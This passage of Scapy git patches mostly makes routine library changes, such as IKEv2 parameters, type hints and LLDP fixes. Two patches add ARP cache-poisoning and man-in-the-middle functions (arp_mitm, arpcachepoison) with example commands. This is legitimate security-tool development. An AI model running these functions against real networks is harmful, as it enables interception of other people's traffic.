++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ +| 2.4.5 | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | ++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ +| 2.5.0 | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ++---------------+----------------+------------+----------------+------------+------------+------------+------------------+ .. note:: From e3e843114c0bcc048290db6d1b94b53329310770 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 9 Oct 2022 22:57:32 +0200 Subject: [PATCH 0903/1632] Absolute link to logo (So that PyPi can follow it too) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index ba7b62253f4..c1aa4d05ea1 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ -# Scapy   Scapy +# Scapy   Scapy [![Scapy unit tests](https://github.com/secdev/scapy/workflows/Scapy%20unit%20tests/badge.svg?event=push)](https://github.com/secdev/scapy/actions?query=workflow%3A%22Scapy+unit+tests%22+branch%3Amaster+event%3Apush) [![AppVeyor Build status](https://ci.appveyor.com/api/projects/status/os03daotfja0wtp7/branch/master?svg=true)](https://ci.appveyor.com/project/secdev/scapy/branch/master) From 181bb2f4b730509583da01ad977d198b088a3226 Mon Sep 17 00:00:00 2001 From: Johann Bauer Date: Mon, 10 Oct 2022 21:06:16 +0200 Subject: [PATCH 0904/1632] Add new IKEv2 parameters (#3621) --- scapy/contrib/ikev2.py | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/scapy/contrib/ikev2.py b/scapy/contrib/ikev2.py index b0e52a0775a..137b8b63895 100644 --- a/scapy/contrib/ikev2.py +++ b/scapy/contrib/ikev2.py @@ -46,6 +46,9 @@ "Camellia-CCM-8ICV": 25, "Camellia-CCM-12ICV": 26, "Camellia-CCM-16ICV": 27, + "ChaCha20-Poly1305": 28, + "Kuzneychik-MGM-KTREE": 32, + "MAGMA-MGM-KTREE": 33, }, 0), "PRF": (2, {"PRF_HMAC_MD5": 1, "PRF_HMAC_SHA1": 2, @@ -55,6 +58,7 @@ "PRF_HMAC_SHA2_384": 6, "PRF_HMAC_SHA2_512": 7, "PRF_AES128_CMAC": 8, + "PRF_HMAC_STREEBOG_512": 9, }, 0), "Integrity": (3, {"HMAC-MD5-96": 1, "HMAC-SHA1-96": 2, @@ -87,6 +91,14 @@ "2048MODP256POSgr": 24, "192randECPgr": 25, "224randECPgr": 26, + "brainpoolP224r1gr": 27, + "brainpoolP256r1gr": 28, + "brainpoolP384r1gr": 29, + "brainpoolP512r1gr": 30, + "curve25519gr": 31, + "curve448gr": 32, + "GOST3410_2012_256": 33, + "GOST3410_2012_512": 34, }, 0), "Extended Sequence Number": (5, {"No ESN": 0, "ESN": 1}, 0), From bf4a66daf8ad99e27e36466a9fd66f9eeea48341 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Niccol=C3=B2=20Maggioni?= Date: Mon, 10 Oct 2022 16:37:25 +0200 Subject: [PATCH 0905/1632] Skip deleting tcpreplay temp file if already done --- scapy/sendrecv.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 30b705d3b67..205e73c944d 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -553,7 +553,8 @@ def sendpfast(x, # type: _PacketIterable results = _parse_tcpreplay_result(stdout, stderr, argv) elif conf.verb > 2: log_runtime.info(stdout.decode()) - os.unlink(f) + if os.path.exists(f): + os.unlink(f) return results From a86ad5c888c791015ec6a5f46565dba27a401e1e Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Sat, 1 Oct 2022 11:10:43 +0200 Subject: [PATCH 0906/1632] Python 3: `Packet.__str__()` returns `.command()`, without a warning message Rationale: Scapy has leaved supporting both Python 2 and Python 3 long enough, I think it is safe now to remove this warning. Moreover, having this warning confuses IDEs (see GH#3548). In the Python philosophy, where `repr()` returns a formal representation of the object and `str()` an informal representation, I think the output of the existing (maybe one day, to be deprecated?) method `.command()` makes total sense for this. --- scapy/packet.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 7f64ecd525f..1505a21940d 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -582,8 +582,7 @@ def __str__(self): else: def __str__(self): # type: () -> str - warning("Calling str(pkt) on Python 3 makes no sense!") - return str(self.build()) + return self.summary() def __bytes__(self): # type: () -> bytes From 2c62465909fb1973e767f6f09345b8bc3e4e84a0 Mon Sep 17 00:00:00 2001 From: NNRepos Date: Tue, 11 Oct 2022 00:16:18 +0300 Subject: [PATCH 0907/1632] add type hinting in `modules/nmap.py` --- scapy/config.py | 3 +++ scapy/data.py | 11 +++++++---- scapy/modules/nmap.py | 45 +++++++++++++++++++++++++++++-------------- 3 files changed, 41 insertions(+), 18 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index ff1ab877f08..51b675e7990 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -50,6 +50,7 @@ if TYPE_CHECKING: # Do not import at runtime import scapy.as_resolvers + from scapy.nmap import NmapKnowledgeBase from scapy.packet import Packet from scapy.supersocket import SuperSocket # noqa: F401 import scapy.asn1.asn1 @@ -896,6 +897,8 @@ class Conf(ConfClass): #: Default is False. raise_no_dst_mac = False loopback_name = "lo" if LINUX else "lo0" + nmap_base = "" # type: str + nmap_kdb = None # type: Optional[NmapKnowledgeBase] def __getattribute__(self, attr): # type: (str) -> Any diff --git a/scapy/data.py b/scapy/data.py index f58efbea9a8..ae1f9f4fcd3 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -26,6 +26,7 @@ List, Optional, Tuple, + Union, cast, ) @@ -546,12 +547,14 @@ def select_path(directories, filename): ##################### # knowledge bases # ##################### +KBBaseType = Optional[Union[str, List[Tuple[str, Dict[str, Dict[str, str]]]]]] -class KnowledgeBase: + +class KnowledgeBase(object): def __init__(self, filename): # type: (Optional[Any]) -> None self.filename = filename - self.base = None # type: Optional[str] + self.base = None # type: KBBaseType def lazy_init(self): # type: () -> None @@ -568,7 +571,7 @@ def reload(self, filename=None): self.base = oldbase def get_base(self): - # type: () -> str + # type: () -> Union[str, List[Tuple[str, Dict[str,Dict[str,str]]]]] if self.base is None: self.lazy_init() - return cast(str, self.base) + return cast(Union[str, List[Tuple[str, Dict[str, Dict[str, str]]]]], self.base) diff --git a/scapy/modules/nmap.py b/scapy/modules/nmap.py index 957d80d0236..c247733cc86 100644 --- a/scapy/modules/nmap.py +++ b/scapy/modules/nmap.py @@ -25,9 +25,10 @@ from scapy.arch import WINDOWS from scapy.error import warning from scapy.layers.inet import IP, TCP, UDP, ICMP, UDPerror, IPerror -from scapy.packet import NoPayload +from scapy.packet import NoPayload, Packet from scapy.sendrecv import sr -from scapy.compat import plain_str, raw +from scapy.compat import plain_str, raw, Dict, List, Tuple, Optional, cast, Union +from scapy.plist import SndRcvList, PacketList import scapy.libs.six as six @@ -53,6 +54,7 @@ class NmapKnowledgeBase(KnowledgeBase): """ def lazy_init(self): + # type: () -> None try: fdesc = open(conf.nmap_base if self.filename is None else @@ -63,36 +65,43 @@ def lazy_init(self): return self.base = [] + self.base = cast(List[Tuple[str, Dict[str, Dict[str, str]]]], self.base) name = None - sig = {} + sig = {} # type: Dict[str,Dict[str,str]] for line in fdesc: - line = plain_str(line) - line = line.split('#', 1)[0].strip() - if not line: + str_line = plain_str(line) + str_line = str_line.split('#', 1)[0].strip() + if not str_line: continue - if line.startswith("Fingerprint "): + if str_line.startswith("Fingerprint "): if name is not None: self.base.append((name, sig)) - name = line[12:].strip() + name = str_line[12:].strip() sig = {} continue - if line.startswith("Class "): + if str_line.startswith("Class "): continue - line = _NMAP_LINE.search(line) - if line is None: + match_line = _NMAP_LINE.search(str_line) + if match_line is None: continue - test, values = line.groups() + test, values = match_line.groups() sig[test] = dict(val.split('=', 1) for val in (values.split('%') if values else [])) if name is not None: self.base.append((name, sig)) fdesc.close() + def get_base(self): + # type: () -> List[Tuple[str, Dict]] + return cast(List[Tuple[str, Dict]], super(NmapKnowledgeBase, self).get_base()) + conf.nmap_kdb = NmapKnowledgeBase(None) +conf.nmap_kdb = cast(NmapKnowledgeBase, conf.nmap_kdb) def nmap_tcppacket_sig(pkt): + # type: (Optional[Packet]) -> Dict res = {} if pkt is not None: res["DF"] = "Y" if pkt.flags.DF else "N" @@ -106,6 +115,7 @@ def nmap_tcppacket_sig(pkt): def nmap_udppacket_sig(snd, rcv): + # type: (SndRcvList, PacketList) -> Dict res = {} if rcv is None: res["Resp"] = "N" @@ -130,6 +140,7 @@ def nmap_udppacket_sig(snd, rcv): def nmap_match_one_sig(seen, ref): + # type: (Dict, Dict) -> float cnt = sum(val in ref.get(key, "").split("|") for key, val in six.iteritems(seen)) if cnt == 0 and seen.get("Resp") == "N": @@ -138,6 +149,7 @@ def nmap_match_one_sig(seen, ref): def nmap_sig(target, oport=80, cport=81, ucport=1): + # type: (str, int, int, int) -> Dict res = {} tcpopt = [("WScale", 10), @@ -162,13 +174,14 @@ def nmap_sig(target, oport=80, cport=81, ucport=1): test = "T%i" % (snd.sport - 5000) if rcv is not None and ICMP in rcv: warning("Test %s answered by an ICMP", test) - rcv = None + rcv = None # type: ignore res[test] = rcv return nmap_probes2sig(res) def nmap_probes2sig(tests): + # type: (Dict) -> Dict tests = tests.copy() res = {} if "PU" in tests: @@ -180,7 +193,9 @@ def nmap_probes2sig(tests): def nmap_search(sigs): - guess = 0, [] + # type: (Dict) -> Tuple[Union[int, float], List] + guess = 0, [] # type: Tuple[Union[int, float], List] + conf.nmap_kdb = cast(NmapKnowledgeBase, conf.nmap_kdb) for osval, fprint in conf.nmap_kdb.get_base(): score = 0.0 for test, values in six.iteritems(fprint): @@ -196,6 +211,7 @@ def nmap_search(sigs): @conf.commands.register def nmap_fp(target, oport=80, cport=81): + # type: (str, int, int) -> Tuple[Union[int, float], List] """nmap fingerprinting nmap_fp(target, [oport=80,] [cport=81,]) -> list of best guesses with accuracy """ @@ -205,6 +221,7 @@ def nmap_fp(target, oport=80, cport=81): @conf.commands.register def nmap_sig2txt(sig): + # type: (Dict) -> str torder = ["TSeq", "T1", "T2", "T3", "T4", "T5", "T6", "T7", "PU"] korder = ["Class", "gcd", "SI", "IPID", "TS", "Resp", "DF", "W", "ACK", "Flags", "Ops", From ef293cd445a5048d96bf7bb9f020679863293025 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 12 Oct 2022 18:47:32 +0200 Subject: [PATCH 0908/1632] High-level arp_mitm function --- doc/scapy/usage.rst | 12 +++++ scapy/ansmachine.py | 23 +++++++-- scapy/layers/l2.py | 113 +++++++++++++++++++++++++++++++++++++++++--- scapy/sendrecv.py | 5 ++ 4 files changed, 142 insertions(+), 11 deletions(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index b0c907ca20f..0bdb84e02de 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -1421,6 +1421,18 @@ ARP cache poisoning with double 802.1q encapsulation:: /ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 ) +ARP MitM +-------- +This poisons the cache of 2 machines, then answers all following ARP requests to put the host between. +Calling ctrl^C will restore the connection. + +:: + + $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface + $ sysctl net.ipv4.ip_forward=1 + $ sudo scapy + >>> arp_mitm("192.168.122.156", "192.168.122.17") + TCP Port Scanning ----------------- diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 88127e57fc6..f823e86711b 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -191,23 +191,38 @@ def run(self, *args, **kargs): ) self(*args, **kargs) + def bg(self, *args, **kwargs): + # type: (Any, Any) -> AsyncSniffer + kwargs.setdefault("bg", True) + self(*args, **kwargs) + return self.sniffer + def __call__(self, *args, **kargs): # type: (Any, Any) -> None + bg = kargs.pop("bg", False) optsend, optsniff = self.parse_all_options(2, kargs) self.optsend = self.defoptsend.copy() self.optsend.update(optsend) self.optsniff = self.defoptsniff.copy() self.optsniff.update(optsniff) - try: - self.sniff() - except KeyboardInterrupt: - print("Interrupted by user") + if bg: + self.sniff_bg() + else: + try: + self.sniff() + except KeyboardInterrupt: + print("Interrupted by user") def sniff(self): # type: () -> None sniff(**self.optsniff) + def sniff_bg(self): + # type: () -> None + self.sniffer = AsyncSniffer(**self.optsniff) + self.sniffer.start() + class AnsweringMachineTCP(AnsweringMachine[Packet]): """ diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 06398be00da..93e424c32a3 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -52,6 +52,7 @@ XShortEnumField, XShortField, ) +from scapy.interfaces import _GlobInterfaceType from scapy.libs.six import viewitems from scapy.packet import bind_layers, Packet from scapy.plist import ( @@ -60,7 +61,7 @@ SndRcvList, _PacketList, ) -from scapy.sendrecv import sendp, srp, srp1 +from scapy.sendrecv import sendp, srp, srp1, srploop from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \ mac2str, valid_mac, valid_net, valid_net6 from scapy.compat import ( @@ -729,13 +730,39 @@ class Dot1AD(Dot1Q): @conf.commands.register -def arpcachepoison(target, victim, interval=60): - # type: (str, str, int) -> None - """Poison target's cache with (victim's IP, your MAC) couple -arpcachepoison(target, victim, [interval=60]) -> None -""" +def arpcachepoison( + target, # type: str + addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]] + interval=60, # type: int +): + # type: (...) -> None + """Poison target's ARP cache + + :param addresses: Can be either a string, a tuple of a list of tuples. + If it's a string, it's the IP to usurpate in the victim, + with the local interface's MAC. If it's a tuple, + it's ("IP", "MAC"). It it's a list, it's [("IP", "MAC")] + + Examples for target "192.168.0.2":: + + >>> arpcachepoison("192.168.0.2", "192.168.0.1") + >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0"))) + >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"), + ... ("192.168.0.2", "aa:aa:aa:aa:aa:aa")]) + + """ + if isinstance(addresses, str): + couple_list = [(addresses, get_if_hwaddr(conf.route.route(target)[0]))] + elif isinstance(addresses, tuple): + couple_list = [addresses] + else: + couple_list = addresses tmac = getmacbyip(target) - p = Ether(dst=tmac) / ARP(op="who-has", psrc=victim, pdst=target) + p = [ + Ether(dst=tmac, src=y) / ARP(op="who-has", psrc=x, pdst=target, + hwsrc=y, hwdst="ff:ff:ff:ff:ff:ff") + for x, y in couple_list + ] try: while True: sendp(p, iface_hint=target) @@ -746,6 +773,78 @@ def arpcachepoison(target, victim, interval=60): pass +@conf.commands.register +def arp_mitm( + ip1, # type: str + ip2, # type: str + mac1=None, # type: Optional[str] + mac2=None, # type: Optional[str] + target_mac=None, # type: Optional[str] + iface=None, # type: Optional[_GlobInterfaceType] + inter=3, # type: int +): + # type: (...) -> None + """ARP MitM: poison 2 target's ARP cache + + :param ip1: IPv4 of the first machine + :param ip2: IPv4 of the second machine + :param mac1: MAC of the first machine (optional: will ARP otherwise) + :param mac2: MAC of the second machine (optional: will ARP otherwise) + :param target_mac: MAC of the attacker (optional: default to the interface's one) + :param iface: the network interface. (optional: default, route for ip1) + + Example usage:: + + $ sysctl net.ipv4.conf.virbr0.send_redirects=0 # virbr0 = interface + $ sysctl net.ipv4.ip_forward=1 + $ sudo scapy + >>> arp_mitm("192.168.122.156", "192.168.122.17") + + Remember to change the sysctl settings back.. + """ + if not iface: + iface = conf.route.route(ip1)[0] + if not target_mac: + target_mac = get_if_hwaddr(iface) + if mac1 is None: + mac1 = getmacbyip(ip1) + if not mac1: + print("Can't resolve mac for %s" % ip1) + return + if mac2 is None: + mac2 = getmacbyip(ip2) + if not mac2: + print("Can't resolve mac for %s" % ip2) + return + print("MITM on %s: %s <--> %s <--> %s" % (iface, mac1, target_mac, mac2)) + # We loop who-has requests + srploop( + [ + Ether(dst=mac1, src=target_mac) / + ARP(op="who-has", psrc=ip2, pdst=ip1, + hwsrc=target_mac, hwdst="ff:ff:ff:ff:ff:ff"), + Ether(dst=mac2, src=target_mac) / + ARP(op="who-has", psrc=ip1, pdst=ip2, + hwsrc=target_mac, hwdst="ff:ff:ff:ff:ff:ff") + ], + filter="arp and arp[7] = 2", + inter=inter, + iface=iface, + timeout=0.5, + verbose=1, + store=0, + ) + print("Restoring...") + sendp([ + Ether(dst=mac1, src=target_mac) / + ARP(op="who-has", psrc=ip2, pdst=ip1, + hwsrc=mac2, hwdst="ff:ff:ff:ff:ff:ff"), + Ether(dst=mac2, src=target_mac) / + ARP(op="who-has", psrc=ip1, pdst=ip2, + hwsrc=mac1, hwdst="ff:ff:ff:ff:ff:ff") + ], iface=iface) + + class ARPingResult(SndRcvList): def __init__(self, res=None, # type: Optional[Union[_PacketList[QueryAnswer], List[QueryAnswer]]] # noqa: E501 diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 205e73c944d..78104fd96b5 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -763,6 +763,11 @@ def __sr_loop(srfunc, # type: Callable[..., Tuple[SndRcvList, PacketList]] print(" " * len(msg), end=' ') if verbose > 1 and not (prn or prnfail): print("recv:%i fail:%i" % tuple(map(len, res[:2]))) + if verbose == 1: + if res[0]: + os.write(1, b"*") + if res[1]: + os.write(1, b".") if store: ans += res[0] unans += res[1] From 2f07f214e87baaba998049bd9f4b3283da940450 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 13 Oct 2022 13:58:30 +0200 Subject: [PATCH 0909/1632] Support multiple targets in arpcachepoison --- scapy/layers/l2.py | 33 ++++++++++++++++++++------------- 1 file changed, 20 insertions(+), 13 deletions(-) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 93e424c32a3..fb9b0542549 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -9,7 +9,6 @@ from __future__ import absolute_import from __future__ import print_function -import os import struct import time import socket @@ -548,9 +547,10 @@ def mysummary(self): def l2_register_l3_arp(l2, l3): - # type: (Type[Packet], Type[Packet]) -> Optional[str] + # type: (Packet, Packet) -> Optional[str] # TODO: support IPv6? - if l3.plen == 4: + plen = l3.plen if l3.plen is not None else l3.get_field("pdst").i2len(l3, l3.pdst) + if plen == 4: return getmacbyip(l3.pdst) log_runtime.warning( "Unable to guess L2 MAC address from an ARP packet with a " @@ -731,13 +731,15 @@ class Dot1AD(Dot1Q): @conf.commands.register def arpcachepoison( - target, # type: str + target, # type: Union[str, List[str]] addresses, # type: Union[str, Tuple[str, str], List[Tuple[str, str]]] - interval=60, # type: int + interval=15, # type: int ): # type: (...) -> None - """Poison target's ARP cache + """Poison targets' ARP cache + :param target: Can be an IP, subnet (string) or a list of IPs. This lists the IPs + or subnets that will be poisoned. :param addresses: Can be either a string, a tuple of a list of tuples. If it's a string, it's the IP to usurpate in the victim, with the local interface's MAC. If it's a tuple, @@ -746,28 +748,33 @@ def arpcachepoison( Examples for target "192.168.0.2":: >>> arpcachepoison("192.168.0.2", "192.168.0.1") + >>> arpcachepoison("192.168.0.1/24", "192.168.0.1") + >>> arpcachepoison(["192.168.0.2", "192.168.0.3"], "192.168.0.1") >>> arpcachepoison("192.168.0.2", ("192.168.0.1", get_if_hwaddr("virbr0"))) >>> arpcachepoison("192.168.0.2", [("192.168.0.1", get_if_hwaddr("virbr0"), ... ("192.168.0.2", "aa:aa:aa:aa:aa:aa")]) """ + if isinstance(target, str): + targets = Net(target) # type: Union[Net, List[str]] + str_target = target + else: + targets = target + str_target = target[0] if isinstance(addresses, str): - couple_list = [(addresses, get_if_hwaddr(conf.route.route(target)[0]))] + couple_list = [(addresses, get_if_hwaddr(conf.route.route(str_target)[0]))] elif isinstance(addresses, tuple): couple_list = [addresses] else: couple_list = addresses - tmac = getmacbyip(target) p = [ - Ether(dst=tmac, src=y) / ARP(op="who-has", psrc=x, pdst=target, - hwsrc=y, hwdst="ff:ff:ff:ff:ff:ff") + Ether(src=y) / ARP(op="who-has", psrc=x, pdst=targets, + hwsrc=y, hwdst="ff:ff:ff:ff:ff:ff") for x, y in couple_list ] try: while True: - sendp(p, iface_hint=target) - if conf.verb > 1: - os.write(1, b".") + sendp(p, iface_hint=str_target) time.sleep(interval) except KeyboardInterrupt: pass From 139966f37ee4188c676b958260312b1e4ad81be2 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 14 Oct 2022 16:42:16 +0200 Subject: [PATCH 0910/1632] Improve scan coverage of UDS_RMBAEnumerator --- scapy/contrib/automotive/uds_scan.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 7c5244646e8..b55059071cc 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -1023,7 +1023,7 @@ def __request_to_pois(self, req, resp): msl = req.memorySizeLen mal = req.memoryAddressLen - if (resp is None or resp.service == 0x7f) and size > 16: + if (resp is None or resp.service == 0x7f) and size > 1: size = size // 2 return [ From 1ac6ce4773a919ffcd4bcf9676c8773c7ca72c16 Mon Sep 17 00:00:00 2001 From: "Dr. Matthias St. Pierre" Date: Sun, 6 Nov 2022 17:38:45 +0100 Subject: [PATCH 0911/1632] asn1.mib: fix (obsolete) duplicate certificate extension oid names The `certificateExtension_oids` dictionary contains several oids with duplicate names, one of which has been declared obsolete: * [2.5.29.1] authorityKeyIdentifier * [2.5.29.3] certificatePolicies * [2.5.29.5] policyMapping * [2.5.29.7] subjectAltName * [2.5.29.8] issuerAltName * [2.5.29.10] basicConstraints * [2.5.29.25] cRLDistributionPoints * [2.5.29.26] issuingDistributionPoint * [2.5.29.34] policyConstraints For example, the oid values [2.5.29.10] and [2.5.29.19] are registered with the name `basicConstraints`. The former is obsolete since 2000 and has been replaced by the latter. Unfortunately, the obsolete oid is chosen by Scapy when the ASN1_OID object is constructed from its name: >>> oid1=ASN1_OID('basicConstraints') >>> oid1 >>> oid1.val '2.5.29.10' This bug caused a one byte discrepancy with an ASN1_ID dissected from an X509 certificate. >>> oid2 >>> oid1 == oid2 False >>> oid2.val '2.5.29.19' *Note*: the duplicate oids have been present in the dictionary for a while, but only after commit 5143eff9 (Reverse MIB storage format, 2018-09-23) the bug became manifest, because previously the obsolete oid value was overwritten by the correct one in the dictionary: ~/src/scapy$ git show 5143eff9 | grep basicConstraints - "basicConstraints": "2.5.29.10", - "basicConstraints": "2.5.29.19", + "2.5.29.10": "basicConstraints", + "2.5.29.19": "basicConstraints", [2.5.29.1]: http://oid-info.com/get/2.5.29.1 [2.5.29.3]: http://oid-info.com/get/2.5.29.3 [2.5.29.5]: http://oid-info.com/get/2.5.29.5 [2.5.29.7]: http://oid-info.com/get/2.5.29.7 [2.5.29.8]: http://oid-info.com/get/2.5.29.8 [2.5.29.10]: http://oid-info.com/get/2.5.29.10 [2.5.29.19]: http://oid-info.com/get/2.5.29.19 [2.5.29.25]: http://oid-info.com/get/2.5.29.25 [2.5.29.26]: http://oid-info.com/get/2.5.29.26 [2.5.29.34]: http://oid-info.com/get/2.5.29.34 --- scapy/asn1/mib.py | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 7a61411b9e1..e3d23a5442c 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -367,16 +367,16 @@ def load_mib(filenames): } certificateExtension_oids = { - "2.5.29.1": "authorityKeyIdentifier", + "2.5.29.1": "authorityKeyIdentifier(obsolete)", "2.5.29.2": "keyAttributes", - "2.5.29.3": "certificatePolicies", + "2.5.29.3": "certificatePolicies(obsolete)", "2.5.29.4": "keyUsageRestriction", "2.5.29.5": "policyMapping", "2.5.29.6": "subtreesConstraint", - "2.5.29.7": "subjectAltName", - "2.5.29.8": "issuerAltName", + "2.5.29.7": "subjectAltName(obsolete)", + "2.5.29.8": "issuerAltName(obsolete)", "2.5.29.9": "subjectDirectoryAttributes", - "2.5.29.10": "basicConstraints", + "2.5.29.10": "basicConstraints(obsolete)", "2.5.29.14": "subjectKeyIdentifier", "2.5.29.15": "keyUsage", "2.5.29.16": "privateKeyUsagePeriod", @@ -388,8 +388,8 @@ def load_mib(filenames): "2.5.29.22": "expirationDate", "2.5.29.23": "instructionCode", "2.5.29.24": "invalidityDate", - "2.5.29.25": "cRLDistributionPoints", - "2.5.29.26": "issuingDistributionPoint", + "2.5.29.25": "cRLDistributionPoints(obsolete)", + "2.5.29.26": "issuingDistributionPoint(obsolete)", "2.5.29.27": "deltaCRLIndicator", "2.5.29.28": "issuingDistributionPoint", "2.5.29.29": "certificateIssuer", @@ -397,7 +397,7 @@ def load_mib(filenames): "2.5.29.31": "cRLDistributionPoints", "2.5.29.32": "certificatePolicies", "2.5.29.33": "policyMappings", - "2.5.29.34": "policyConstraints", + "2.5.29.34": "policyConstraints(obsolete)", "2.5.29.35": "authorityKeyIdentifier", "2.5.29.36": "policyConstraints", "2.5.29.37": "extKeyUsage", From 859612ed9760c21c0d5c7d7968312ac6183f71f5 Mon Sep 17 00:00:00 2001 From: Leandro Lisboa Penz Date: Mon, 7 Nov 2022 09:07:24 +0000 Subject: [PATCH 0912/1632] LLDP: fix support of non-IPv4 network addresses in chassis/port IDs (#3773) LLDPDUChassisID and LLDPDUPortID have a subtype "network address" (0x05 and 0x04 respectively) for the "id" field that interprets it as having the first octect specifying an address family, and the other octects being interpreted in the specified address family. We were supporting the specific parsing of IPv4 in this field, and that was working fine. The other possible address families were not working because: - we were not checking the family field when choosing IPField as the class for the id and - we were not subtracting the the family field from the length of the id in length_from when using StrLenField as the type. These issues prevented the parsing and crafting of packets where the address family is arbitrary or simply different from IPv4. Besides fixing and adding tests, this commit also adds support for IPv6 as a specific parser for the network address field, when the address family is 0x02. --- scapy/contrib/lldp.py | 106 +++++++++++++++++++++++++----------------- test/contrib/lldp.uts | 59 +++++++++++++++++++++++ 2 files changed, 122 insertions(+), 43 deletions(-) diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index 9888f283f70..420d6853abc 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -38,7 +38,7 @@ from scapy.config import conf from scapy.error import Scapy_Exception from scapy.layers.l2 import Ether, Dot1Q -from scapy.fields import MACField, IPField, BitField, \ +from scapy.fields import MACField, IPField, IP6Field, BitField, \ StrLenField, ByteEnumField, BitEnumField, \ EnumField, ThreeBytesField, BitFieldLenField, \ ShortField, XStrLenField, ByteField, ConditionalField, \ @@ -101,6 +101,40 @@ class LLDPDU(Packet): 127: 'organisation specific TLV' } + IANA_ADDRESS_FAMILY_NUMBERS = { + 0x00: 'other', + 0x01: 'IPv4', + 0x02: 'IPv6', + 0x03: 'NSAP', + 0x04: 'HDLC', + 0x05: 'BBN', + 0x06: '802', + 0x07: 'E.163', + 0x08: 'E.164', + 0x09: 'F.69', + 0x0a: 'X.121', + 0x0b: 'IPX', + 0x0c: 'Appletalk', + 0x0d: 'Decnet IV', + 0x0e: 'Banyan Vines', + 0x0f: 'E.164 with NSAP', + 0x10: 'DNS', + 0x11: 'Distinguished Name', + 0x12: 'AS Number', + 0x13: 'XTP over IPv4', + 0x14: 'XTP over IPv6', + 0x15: 'XTP native mode XTP', + 0x16: 'Fiber Channel World-Wide Port Name', + 0x17: 'Fiber Channel World-Wide Node Name', + 0x18: 'GWID', + 0x19: 'AFI for L2VPN', + 0x1a: 'MPLS-TP Section Endpoint ID', + 0x1b: 'MPLS-TP LSP Endpoint ID', + 0x1c: 'MPLS-TP Pseudowire Endpoint ID', + 0x1d: 'MT IP Multi-Topology IPv4', + 0x1e: 'MT IP Multi-Topology IPv6' + } + DOT1Q_HEADER_LEN = 4 ETHER_HEADER_LEN = 14 ETHER_FSC_LEN = 4 @@ -280,6 +314,19 @@ def _ldp_id_adjustlen(pkt, x): return length +def _ldp_id_lengthfrom(pkt): + length = pkt._length + if length is None: + return 0 + # Subtract the subtype field + length -= 1 + if (isinstance(pkt, LLDPDUPortID) and pkt.subtype == 0x4) or \ + (isinstance(pkt, LLDPDUChassisID) and pkt.subtype == 0x5): + # Take the ConditionalField into account + length -= 1 + return length + + class LLDPDUChassisID(LLDPDU): """ ieee 802.1ab-2016 - sec. 8.5.2 / p. 26 @@ -310,7 +357,7 @@ class LLDPDUChassisID(LLDPDU): adjust=lambda pkt, x: _ldp_id_adjustlen(pkt, x)), ByteEnumField('subtype', 0x00, LLDP_CHASSIS_ID_TLV_SUBTYPES), ConditionalField( - ByteField('family', 0), + ByteEnumField('family', 0, LLDPDU.IANA_ADDRESS_FAMILY_NUMBERS), lambda pkt: pkt.subtype == 0x05 ), MultipleTypeField([ @@ -320,10 +367,13 @@ class LLDPDUChassisID(LLDPDU): ), ( IPField('id', None), - lambda pkt: pkt.subtype == 0x05 + lambda pkt: pkt.subtype == 0x05 and pkt.family == 0x01 + ), + ( + IP6Field('id', None), + lambda pkt: pkt.subtype == 0x05 and pkt.family == 0x02 ), - ], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is - None else pkt._length - 1) + ], StrLenField('id', '', length_from=_ldp_id_lengthfrom) ) ] @@ -365,7 +415,7 @@ class LLDPDUPortID(LLDPDU): adjust=lambda pkt, x: _ldp_id_adjustlen(pkt, x)), ByteEnumField('subtype', 0x00, LLDP_PORT_ID_TLV_SUBTYPES), ConditionalField( - ByteField('family', 0), + ByteEnumField('family', 0, LLDPDU.IANA_ADDRESS_FAMILY_NUMBERS), 